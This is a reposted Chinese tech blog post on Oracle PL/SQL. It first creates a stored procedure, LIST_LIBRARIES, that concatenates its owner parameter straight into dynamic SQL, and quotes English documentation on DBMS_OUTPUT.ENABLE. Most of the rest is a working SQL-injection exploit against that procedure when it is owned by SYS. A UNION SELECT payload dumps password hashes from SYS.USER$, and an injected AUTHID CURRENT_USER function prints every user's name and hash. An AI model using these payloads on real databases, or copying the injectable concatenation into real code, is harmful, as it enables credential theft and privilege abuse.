ORACLE中檢視使用者的庫函式資訊
建立儲存過程:
CREATE OR REPLACE PROCEDURE LIST_LIBRARIES(P_OWNER VARCHAR2) AS
TYPE C_TYPE IS REF CURSOR;
CV C_TYPE;
BUFFER VARCHAR2(200);
BEGIN
DBMS_OUTPUT.ENABLE(1000000);
OPEN CV FOR 'SELECT OBJECT_NAME FROM ALL_OBJECTS WHERE OWNER = '''
|| P_OWNER || ''' AND OBJECT_TYPE=''LIBRARY''';
LOOP
FETCH CV INTO buffer;
DBMS_OUTPUT.PUT_LINE(BUFFER);
EXIT WHEN CV%NOTFOUND;
END LOOP;
CLOSE CV;
END;
/
關於DBMS_OUTPUT.ENABLE的作用下面引一篇洋文來進行解釋:
TThe ENABLE procedure enables calls to the other DBMS_OUTPUT modules. If you do not first call ENABLE, then any other calls to the package modules are ignored. The specification for the procedure is,
PROCEDURE DBMS_OUTPUT.ENABLE
(buffer_size IN INTEGER DEFAULT 20000);
buffer_size The size of the buffer that will contain the information stored by calls to PUT and PUT_LINE. The buffer size can be as large as 1,000,000 bytes. You can pass larger values to this procedure without raising an error, but doing so will have no effect besides setting the buffer size to its maximum.
You can call ENABLE more than once in a session. The buffer size will be set to the largest size passed in any call to ENABLE. In other words, the buffer size is not necessarily set to the size specified in the last call.
If you want to make sure that the DBMS_OUTPUT package is enabled in a program you are testing, add a statement like this one to the start of the program:
DECLARE
... declarations ...
BEGIN
DBMS_OUTPUT.ENABLE (1000000);
...
END;
Remarks
This procedure call is not necessary when testing in a SQL*Plus environment. However, To enable output from calls to PUT_LINE in SQL*Plus, you will use the SET SERVEROUTPUT command,
SQL> SET SERVEROUTPUT ON
to see your results. This procedure is only required when you are using DBMS_OUTPUT to capture data in a client/server mode or a precompiler language program. Any PUT/GET calls prior to ENABLE are a no-op.
In a precompiler program - for testing only - the main program will most likely call ENABLE as part of program initialization. At various points within the application there may be triggers and stored procedures that call PUT_LINE. The main C (or other language) program or its subroutines will make calls to GET_LINE to capture the data written to DBMS_OUTPUT - these calls are made following the actions (SQL statements or stored procedure calls) that activated the calls to PUT_LINE. Having called GET_LINE, the main program can print the data captured.
Debugging a difficult problem may require going back to a unit test mode and testing a stored procedure from SQL*Plus.
When the buffer overflows an exception (-20000) is raised. When this occurs there are several options:
w Increase the size of the DBMS_OUTPUT buffer to 1,000,000
w Try filtering the data written to the buffer - possibly there is a loop that writes to DBMS_OUTPUT and you do not need this data.
w Call ENABLE at various checkpoints within your code. Each call will clear the buffer.
w Use an alternate debug interface to DBMS_OUTPUT.
接下來我們要如何來呼叫我們建立的儲存過程呢?
SET SERVEROUTPUT ON
EXEC SYS.LIST_LIBRARIES('SYS');
再來看個注入的呼叫:
SET SERVEROUTPUT ON
EXEC SYS.LIST_LIBRARIES('FOO'' UNION SELECT PASSWORD FROM SYS.USER$--');
此時就可以返回SYS.USER$表中每個使用者的密碼的雜湊值了。
[@more@]進一步地,透過之前的儲存過程呼叫我們自定義的函式進行注入:
CREATE OR REPLACE FUNCTION GET_USERS RETURN VARCHAR2 AUTHID CURRENT_USER AS TYPE C_TYPE IS REF CURSOR; CV C_TYPE; U VARCHAR2(200); P VARCHAR2(200); N NUMBER; BEGIN DBMS_OUTPUT.ENABLE(1000000); OPEN CV FOR 'SELECT USER#,NAME,PASSWORD FROM SYS.USER$'; LOOP FETCH CV INTO N,U,P; DBMS_OUTPUT.PUT_LINE('USER#: ' || N || ' NAME ' || U || ' PWD ' || P); EXIT WHEN CV%NOTFOUND; END LOOP; CLOSE CV; RETURN 'FOO'; END;
呼叫方法:
EXEC SYS.LIST_LIBRARIES('FOO'' || SCOTT.GET_USERS--');
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/13442480/viewspace-1033710/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- eclipse中檢視某個方法(函式)被誰呼叫Eclipse函式
- 【函式】oracle視窗函式over()的理解函式Oracle
- Flashback area中檢視不到歸檔的資訊
- Oracle分析函式與視窗函式Oracle函式
- 【許可權管理】Oracle中檢視、回收使用者許可權Oracle
- Oracle中檢視某個表的建立時間 - [Oracle]Oracle
- Hadoop中檢視一個檔案位置資訊Hadoop
- oracle中檢視某個表的索引是否有效Oracle索引
- ORACLE EBS中檢視某個Request的Output FileOracle
- ORACLE中檢視執行計劃(轉)Oracle
- oracle資料庫常用分析函式與聚合函式的用法Oracle資料庫函式
- Oracle中檢視哪些objects 是nologging 的OracleObject
- 【轉】檢視Oracle當前使用者下的資訊Oracle
- PHP Oracle 資料庫函式庫(轉)PHPOracle資料庫函式
- 10G中檢視歷史執行計劃資訊
- Oracle中檢視已執行sql的執行計劃OracleSQL
- PHP 函式庫 1 - 函式庫的分類PHP函式
- 檢視各項Oracle資料庫資訊Oracle資料庫
- Oracle中檢視sql命令歷史,檢視rman命令歷史OracleSQL
- React Native Debugger在Chrome中檢視network資訊React NativeChrome
- 【函式】ORACLE函式大全函式Oracle
- 在Android中檢視和管理sqlite資料庫AndroidSQLite資料庫
- Oracle的dump函式Oracle函式
- Oracle的日期函式Oracle函式
- Oracle常用的函式Oracle函式
- Oracle聚合函式/分析函式Oracle函式
- oracle自動化同步兩庫使用者的統計資訊Oracle
- Oracle資料庫Decode()函式的使用方法Oracle資料庫函式
- 視窗函式函式
- 【函式】Oracle EXTRACT()函式與to_char() 函式函式Oracle
- 檢視oracle資料庫的連線數以及使用者檢視Oracle資料庫
- oracle 函式Oracle函式
- oracle or 函式Oracle函式
- Oracle函式Oracle函式
- ORACLE資料庫檢視ACQ(ACTIVE CHECKPOINT QUEUE)資訊Oracle資料庫
- 啟用oracle資料庫密碼函式Oracle資料庫密碼函式
- oracle的分析函式over 及開窗函式Oracle函式
- 【函式】Oracle函式系列(2)--數學函式及日期函式函式Oracle